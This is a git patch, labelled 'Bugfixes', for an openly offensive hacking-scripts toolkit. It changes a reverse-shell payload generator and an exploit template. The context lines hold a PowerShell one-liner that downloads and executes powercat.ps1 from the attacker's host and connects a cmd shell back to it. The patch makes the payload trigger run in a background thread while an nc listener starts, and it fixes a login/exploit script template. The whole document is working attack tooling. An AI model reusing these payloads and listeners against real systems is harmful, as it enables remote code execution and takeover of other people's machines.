From 1891efe2e46e1f6f5ef4aa18b6dbf43711670fe8 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Fri, 11 Jun 2021 12:44:35 +0200 Subject: [PATCH] Bugfixes --- genRevShell.py | 8 +++++++- template.py | 15 +++++++++------ 2 files changed, 16 insertions(+), 7 deletions(-) diff --git a/genRevShell.py b/genRevShell.py index 7ae7dc7..c5c23a5 100755 --- a/genRevShell.py +++ b/genRevShell.py @@ -4,6 +4,8 @@ import socket import sys import pty import util +import time +import threading def generatePayload(type, local_address, port): @@ -29,7 +31,11 @@ def generatePayload(type, local_address, port): return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port) def triggerShell(func, port): - func() + def _wait_and_exec(): + time.sleep(1.5) + func() + + threading.Thread(target=_wait_and_exec).start() pty.spawn(["nc", "-lvvp", str(port)]) diff --git a/template.py b/template.py index ca121b1..ed64fb9 100755 --- a/template.py +++ b/template.py @@ -5,21 +5,23 @@ import sys def generateTemplate(baseUrl): template = """#!/usr/bin/env python -import requests -import base64 +import sys import json +import base64 +import requests from bs4 import BeautifulSoup from hackingscripts import util, fileserver + from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) -BASE_URL = "%s" +BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" def login(username, password): # Template method to create a session session = requests.Session() post_data = { "username": username, "password": password } - res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False) + res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False) if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home": print("Login failed") exit() @@ -29,8 +31,9 @@ def exploit(session, payload): # Template method to exploit an endpoint pass -session = login() -exploit(session, "id") +if __name__ == "__main__": + session = login() + exploit(session, "id") """ % baseUrl return template